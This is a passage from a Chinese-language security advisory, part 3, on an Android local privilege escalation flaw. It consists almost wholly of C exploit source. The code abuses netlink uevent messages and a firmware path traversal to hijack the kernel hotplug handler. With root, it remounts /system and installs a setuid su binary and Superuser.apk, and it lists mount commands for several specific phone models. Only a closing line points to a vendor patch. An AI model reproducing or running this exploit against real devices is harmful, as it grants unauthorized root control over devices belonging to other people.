Open Handset Alliance Android本地权限提升漏洞(3)

int main(int argc, char **argv, char **env)
{
char buf[512], path[512];
int ofd;
struct sockaddr_nl snl;
struct iovec iov = {buf, sizeof(buf)};
struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
int sock;
char *basedir = NULL;

/* I hope there is no LD_ bug in androids rtld :) */
/*if (geteuid() == 0 && getuid() != 0)
rootshell(env);*/

if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
die("[-] readlink");

if (geteuid() == 0) {
clear_hotplug();
/* remount /system rw */
//DROID 1 and Ally
//mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0);
//DROID X
//mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0);
//GALAXY S
mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0);
//Eris and HTC Hero
//mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0);
//copy("/sdcard/su","/system/bin/su");
//copy("/sdcard/Superuser.apk","/system/app/Superuser.apk");
copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su");
copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk");
chmod("/system/bin/su", 04755);
chmod("/system/app/Superuser.apk", 04744);

for (;;);
}

//basedir = "/sqlite_stmt_journals";
basedir = "/data/data/com.unstableapps.easyroot/files";
if (chdir(basedir) < 0) {
basedir = "/data/local/tmp";
if (chdir(basedir) < 0)
basedir = strdup(getcwd(buf, sizeof(buf)));
}

memset(&snl, 0, sizeof(snl));
snl.nl_pid = 1;
snl.nl_family = AF_NETLINK;

if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
die("[-] socket");

close(creat("loading", 0666));
if ((ofd = creat("hotplug", 0644)) < 0)
die("[-] creat");
if (write(ofd, path , strlen(path)) < 0)
die("[-] write");
close(ofd);
symlink("/proc/sys/kernel/hotplug", "data");
snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
        "SUBSYSTEM=firmware%c"
        "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
printf("[+] sending add message ...\n");
if (sendmsg(sock, &msg, 0) < 0)
die("[-] sendmsg");
close(sock);
sleep(3);
return 0;
}

建议：
--------------------------------------------------------------------------------
厂商补丁：

Open Handset Alliance
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：